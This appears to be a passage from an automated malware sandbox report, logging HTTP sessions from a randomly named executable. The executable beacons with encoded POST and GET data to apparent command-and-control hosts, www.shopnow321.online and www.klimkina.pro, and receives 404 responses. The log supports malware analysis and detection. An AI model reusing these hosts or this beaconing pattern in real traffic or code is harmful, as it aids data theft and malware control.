                                                                            Accept-Ranges: bytes
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Content-Length: 836
                                                                            Content-Type: text/html
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                                                                            Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449747162.241.2.254805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:09.080625057 CEST10807OUTPOST /41br/ HTTP/1.1
                                                                            Host: www.shopnow321.online
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.shopnow321.online
                                                                            Referer: http://www.shopnow321.online/41br/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 42 2f 52 44 71 4b 79 72 39 2f 47 6e 6d 66 63 72 68 79 6c 52 31 4f 36 50 36 30 45 76 6a 72 34 55 66 55 7a 63 54 63 35 4c 79 72 76 52 49 6b 37 75 54 74 63 33 4b 6c 77 68 50 7a 42 4f 54 48 51 6b 53 35 4b 65 4f 51 63 79 65 69 57 45 4e 72 75 35 42 71 78 4d 51 4a 64 50 58 35 52 6c 75 63 48 58 39 63 68 46 31 44 64 34 59 5a 63 64 6e 79 5a 6e 53 58 52 4d 7a 2f 44 32 66 75 39 4c 44 31 77 34 5a 41 69 59 68 66 4e 36 4e 4e 48 6b 75 67 6d 66 76 69 61 71 62 2b 50 6d 48 6f 67 30 69 55 61 4f 58 2b 47 66 50 50 34 5a 56 45 65 2f 33 6b 4f 79 4f 54 2b 72 45 42 35 35 6c 6f 78 57 65 72 34 70 4f 4f 57 57 52 61 55 6e 4b 31 71 73 44 62 41 62 47 2b 59 66 6d 75 4f 32 53 67 49 72 63 46 4e 69 4e 6e 4c 45 65 47 47 51 42 67 2f 43 72 6d 53 79 50 75 42 67 41 57 41 59 31 51 44 2f 4e 32 50 4f 79 2b 2b 76 74 4c 4a 4d 7a 4a 30 6c 37 41 46 50 71 45 62 51 32 51 43 72 53 68 6f 49 71 42 72 44 4a 41 79 75 64 66 34 6d 4e 50 67 4e 55 39 68 36 2b 47 54 45 30 67 6d 4e 34 55 79 6d 52 62 66 [TRUNCATED]
                                                                            Data Ascii: tF1tk6=37p05Z2HjoMoB/RDqKyr9/GnmfcrhylR1O6P60Evjr4UfUzcTc5LyrvRIk7uTtc3KlwhPzBOTHQkS5KeOQcyeiWENru5BqxMQJdPX5RlucHX9chF1Dd4YZcdnyZnSXRMz/D2fu9LD1w4ZAiYhfN6NNHkugmfviaqb+PmHog0iUaOX+GfPP4ZVEe/3kOyOT+rEB55loxWer4pOOWWRaUnK1qsDbAbG+YfmuO2SgIrcFNiNnLEeGGQBg/CrmSyPuBgAWAY1QD/N2POy++vtLJMzJ0l7AFPqEbQ2QCrShoIqBrDJAyudf4mNPgNU9h6+GTE0gmN4UymRbfpG4jOdoWDElRqPuu/wu+x8sSCX7zd17jIf7r6LcL9WKdGMlhEBP63X27SSOZ9QvOAKw3mvM9eW4SnNgQNSrdswEyawEysnldYFvEcd3VWQHe/BmtKCOwaq01sTb24B8mKDm+NZewPn2DEGLR0TEuMIzwPEKzsvTGNYUcyhIMLGGC6vQk3LB/X8w6GxPoSu+ekkdsWIyGSf4W13QhyfB1EiHMlpIeuWzhgG2i4Ipa4ifh5GDkBLXVu8ZQ7S0to5UzgQX41ArvN624bNoSo/3yBhPLoKdAp6jkf6ed/0vk2SUjZs8kFCeICOZPR7fz4V/21wBeY5cxk6No3tu97yxWeijURzlnQiqVakYQK++ImE55yh08LLcxMWp6mLJS7ysamJkIbOSt3LTJrgLw/TkkNaXavdIuDfYjgdAboUseN786dxprzxrmqU0J4v/SyvOw8ItWifcVqf81IIlZRQ7CIDw9nMahgulAdcvar9pWKb3gl/Ay7yQMLfwqkMJGNQLnZJpwmfkKdNtH6Wfm0a1NQyDi3VPwZMfLHeV7LzdmPpd/Sx6nTG3lQ7aOHz3u3dBH78TNc9zJ93/zP5oMjfT87zA4LFVhXIEZXU8j3X1HuADXqtXKZ4ps70hgEenal8PTVdy8N09yBslGOkpUMjROYuNbToTpxAOgep [TRUNCATED]
                                                                            Jun 19, 2024 22:39:09.563412905 CEST1121INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:39:09 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
                                                                            Accept-Ranges: bytes
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Content-Length: 836
                                                                            Content-Type: text/html
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                                                                            Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.449748162.241.2.254805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:11.624327898 CEST436OUTGET /41br/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=65BU6tOk0p5LPOIJv5eZvte3ybUvohRc7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rehilNLqQM6pEfZVUJ4F0gMms0MV4xVJNebQ= HTTP/1.1
                                                                            Host: www.shopnow321.online
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:39:12.113123894 CEST1236INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:39:12 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 2361
                                                                            Vary: Accept-Encoding
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x19
                                                                            Jun 19, 2024 22:39:12.113171101 CEST1236INData Raw: 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70
                                                                            Data Ascii: 2"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/
                                                                            Jun 19, 2024 22:39:12.113198996 CEST151INData Raw: 2d 73 79 73 2f 69 6d 61 67 65 73 2f 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 34 30 34 2e 73 76 67 22 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 2d 78 73 20 69 6d 67 2d 72 65 73 70 6f 6e 73 69 76 65 20 22 20 61 6c 74 3d 22 69 6c 6c 75 73 74 72 61 74
                                                                            Data Ascii: -sys/images/illustration-404.svg" class="hidden-xs img-responsive " alt="illustration"> </div> </div> </div> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.449749185.137.235.193805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:17.228084087 CEST690OUTPOST /4mpz/ HTTP/1.1
                                                                            Host: www.klimkina.pro
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.klimkina.pro
                                                                            Referer: http://www.klimkina.pro/4mpz/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 56 38 45 58 6f 32 66 38 74 5a 31 79 75 4e 64 70 48 66 30 65 4c 30 4a 2f 2f 34 69 52 44 31 63 77 4c 77 79 66 6e 54 54 46 79 54 55 42 37 36 43 68 75 2b 38 55 6f 50 2f 53 39 71 58 37 51 4f 41 38 62 30 65 6a 42 43 2b 37 69 31 2f 66 56 47 42 58 59 7a 63 7a 6c 42 72 6b 71 4e 56 62 79 69 43 4c 73 4c 71 64 57 6c 73 63 56 55 73 4f 76 66 2b 71 53 78 70 74 53 48 63 69 59 30 64 6e 70 6b 39 39 32 62 63 52 43 72 33 58 57 64 72 38 78 75 41 57 53 39 73 48 49 6b 4a 32 6e 66 51 44 75 33 65 51 74 53 6c 65 36 61 7a 6f 68 77 70 77 78 39 67 65 32 4f 50 7a 59 4e 65 4c 61 77 31 68 35 61 36 53 49 77 3d 3d
                                                                            Data Ascii: tF1tk6=V8EXo2f8tZ1yuNdpHf0eL0J//4iRD1cwLwyfnTTFyTUB76Chu+8UoP/S9qX7QOA8b0ejBC+7i1/fVGBXYzczlBrkqNVbyiCLsLqdWlscVUsOvf+qSxptSHciY0dnpk992bcRCr3XWdr8xuAWS9sHIkJ2nfQDu3eQtSle6azohwpwx9ge2OPzYNeLaw1h5a6SIw==
                                                                            Jun 19, 2024 22:39:18.080679893 CEST1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 19 Jun 2024 20:39:17 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID5=fe8e078d9bbe58d91a5515d3e9c8cd8e; expires=Sat, 20-Jul-2024 20:39:17 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            Set-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:17 GMT; Max-Age=86400; path=/; secure; HttpOnly
                                                                            Server-version: 05
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 dd 6e db 36 14 be b6 9f e2 54 bb e8 06 94 52 12 a7 45 7e 64 03 6b 9b 6d 1d 3a 6c d8 ba 8b a1 28 06 5a a2 2c c6 14 a9 8a 94 1d 0f bb 58 5b 6c d8 86 01 03 76 bf 8b be 41 3a 34 dd da b5 d9 2b 48 6f b4 43 4a 4e dc c4 69 ba cc 80 2d 91 3c e7 f0 e3 e1 c7 ef d0 61 cc 27 a0 cd 4c b0 be 97 d3 38 e6 72 44 8c ca b7 60 7d 25 df f3 06 dd 6e 18 a0 05 3e bb e1 a5 9b 9f de b8 f3 d5 67 3b 90 9a 4c 0c ba a1 7d 80 a0 72 d4 f7 98 44 d3 30 65 34 1e 74 01 3f 61 c6 0c 45 3b 93 13 76 bf e4 93 be 77 43 49 c3 a4 21 77 66 39 f3 20 6a 5a 7d cf b0 3d 13 d8 40 db 10 a5 b4 d0 cc f4 4b 93 90 0d 0f 82 41 b7 13 1a 6e 04 1b 7c c8 cc 0d 55 e2 20 10 d8 29 0a 55 c0 4d 96 d0 52 98 30 68 0c d0 d2 4d 28 69 86 cb 98 70 36 cd 55 61 16 a6 99 f2 d8 a4 fd 98 4d 78 c4 88 6b 5c 01 2e b9 e1 54 10 1d 51 5c fc aa bf 62 57 db 09 2f 11 02 b7 15 b5 89 80 eb 4a 19 6d 0a 9a 03 21 16 8e e0 72 0c 69 c1 92 be 17 e4 e5 50 f0 28 48 04 35 a4 e4 c1 70 6e 1a 44 5a 1f b7 7c 6c 79 50 30 d1 f7 5c 92 75 ca 98 39 3d [TRUNCATED]
                                                                            Data Ascii: 54eWn6TRE~dkm:l(Z,X[lvA:4+HoCJNi-<a'L8rD`}%n>g;L}rD0e4t?aE;vwCI!wf9 jZ}=@KAn|U )UMR0hM(ip6UaMxk\.TQ\bW/Jm!riP(H5pnDZ|lyP0\u9=u46x;Y'W0L4MYs,EnTbxg/8w Cnw;:Hven7T,CiIYp|&ckp6<a0"lt]|L]1\<z.b=KyOy'i_:Se{d~o8C8<X!rIxCa{q8,:Z9
                                                                            Jun 19, 2024 22:39:18.080732107 CEST766INData Raw: 11 ee 16 ee 91 0b 22 55 91 e1 19 6d 95 e9 38 52 ab 58 31 d7 39 ae 6c 0b 86 42 45 e3 6d 00 67 d1 09 d3 de 5c d3 8e 2c b8 c4 d3 cb 48 6b d8 06 dc 82 1e ca 9c d3 ba 6d 18 aa 22 66 c5 16 6c 60 8f 56 82 c7 f0 4e 6f 7d 7d f3 ea 8e 37 a8 7e ab 0e ab 3f
                                                                            Data Ascii: "Um8RX19lBEmg\,Hkm"fl`VNo}}7~?W_jGl<>cBzv:k8%\&}~8K8|P?@|Uy:o>^39sp-N;?!{0I9tg?GerI


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.449750185.137.235.193805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:19.761338949 CEST710OUTPOST /4mpz/ HTTP/1.1
                                                                            Host: www.klimkina.pro
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.klimkina.pro
                                                                            Referer: http://www.klimkina.pro/4mpz/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 56 38 45 58 6f 32 66 38 74 5a 31 79 76 75 46 70 42 35 38 65 61 6b 4a 38 31 59 69 52 4e 56 63 30 4c 77 4f 66 6e 58 4c 76 79 6c 6b 42 37 59 61 68 74 2f 38 55 76 50 2f 53 36 61 57 2f 64 75 41 33 62 30 61 72 42 47 36 37 69 31 37 66 56 48 78 58 62 43 63 30 6b 52 72 69 69 74 56 46 73 53 43 4c 73 4c 71 64 57 6c 6f 32 56 55 30 4f 76 76 4f 71 64 30 64 75 52 48 63 74 49 45 64 6e 6a 30 38 32 32 62 63 4a 43 71 37 70 57 66 54 38 78 76 77 57 53 73 73 45 43 6b 4a 77 6f 2f 52 41 68 6b 50 35 71 69 73 58 38 4b 62 2f 6e 7a 68 62 30 37 78 45 6e 2f 75 6b 4b 4e 36 34 48 33 38 56 30 5a 48 62 54 39 57 42 43 72 67 47 42 31 4b 31 53 6c 5a 75 39 48 75 34 59 33 59 3d
                                                                            Data Ascii: tF1tk6=V8EXo2f8tZ1yvuFpB58eakJ81YiRNVc0LwOfnXLvylkB7Yaht/8UvP/S6aW/duA3b0arBG67i17fVHxXbCc0kRriitVFsSCLsLqdWlo2VU0OvvOqd0duRHctIEdnj0822bcJCq7pWfT8xvwWSssECkJwo/RAhkP5qisX8Kb/nzhb07xEn/ukKN64H38V0ZHbT9WBCrgGB1K1SlZu9Hu4Y3Y=
                                                                            Jun 19, 2024 22:39:20.544374943 CEST1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0
                                                                            Date: Wed, 19 Jun 2024 20:39:20 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID5=ba32b58021643d0af7ea5f5cbc056f48; expires=Sat, 20-Jul-2024 20:39:20 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            Set-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:20 GMT; Max-Age=86400; path=/; secure; HttpOnly
                                                                            Server-version: 11
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 dd 6e db 36 14 be b6 9f e2 54 bb e8 06 94 52 12 a7 45 7e 64 03 6b 9b 6d 1d 3a 6c d8 ba 8b a1 28 06 5a a2 2c c6 14 a9 8a 94 1d 0f bb 58 5b 6c d8 86 01 03 76 bf 8b be 41 3a 34 dd da b5 d9 2b 48 6f b4 43 4a 4e dc c4 69 ba cc 80 2d 91 3c e7 f0 e3 e1 c7 ef d0 61 cc 27 a0 cd 4c b0 be 97 d3 38 e6 72 44 8c ca b7 60 7d 25 df f3 06 dd 6e 18 a0 05 3e bb e1 a5 9b 9f de b8 f3 d5 67 3b 90 9a 4c 0c ba a1 7d 80 a0 72 d4 f7 98 44 d3 30 65 34 1e 74 01 3f 61 c6 0c 45 3b 93 13 76 bf e4 93 be 77 43 49 c3 a4 21 77 66 39 f3 20 6a 5a 7d cf b0 3d 13 d8 40 db 10 a5 b4 d0 cc f4 4b 93 90 0d 0f 82 41 b7 13 1a 6e 04 1b 7c c8 cc 0d 55 e2 20 10 d8 29 0a 55 c0 4d 96 d0 52 98 30 68 0c d0 d2 4d 28 69 86 cb 98 70 36 cd 55 61 16 a6 99 f2 d8 a4 fd 98 4d 78 c4 88 6b 5c 01 2e b9 e1 54 10 1d 51 5c fc aa bf 62 57 db 09 2f 11 02 b7 15 b5 89 80 eb 4a 19 6d 0a 9a 03 21 16 8e e0 72 0c 69 c1 92 be 17 e4 e5 50 f0 28 48 04 35 a4 e4 c1 70 6e 1a 44 5a 1f b7 7c 6c 79 50 30 d1 f7 5c 92 75 ca 98 39 3d [TRUNCATED]
                                                                            Data Ascii: 54eWn6TRE~dkm:l(Z,X[lvA:4+HoCJNi-<a'L8rD`}%n>g;L}rD0e4t?aE;vwCI!wf9 jZ}=@KAn|U )UMR0hM(ip6UaMxk\.TQ\bW/Jm!riP(H5pnDZ|lyP0\u9=u46x;Y'W0L4MYs,EnTbxg/8w Cnw;:Hven7T,CiIYp|&ckp6<a0"lt]|L]1\<z.b=KyOy'i_:Se{d~o8C8<X!rIxCa{q8,:Z9
                                                                            Jun 19, 2024 22:39:20.544557095 CEST766INData Raw: 11 ee 16 ee 91 0b 22 55 91 e1 19 6d 95 e9 38 52 ab 58 31 d7 39 ae 6c 0b 86 42 45 e3 6d 00 67 d1 09 d3 de 5c d3 8e 2c b8 c4 d3 cb 48 6b d8 06 dc 82 1e ca 9c d3 ba 6d 18 aa 22 66 c5 16 6c 60 8f 56 82 c7 f0 4e 6f 7d 7d f3 ea 8e 37 a8 7e ab 0e ab 3f
                                                                            Data Ascii: "Um8RX19lBEmg\,Hkm"fl`VNo}}7~?W_jGl<>cBzv:k8%\&}~8K8|P?@|Uy:o>^39sp-N;?!{0I9tg?GerI


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.449751185.137.235.193805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:22.296168089 CEST10792OUTPOST /4mpz/ HTTP/1.1
                                                                            Host: www.klimkina.pro
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.klimkina.pro
                                                                            Referer: http://www.klimkina.pro/4mpz/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
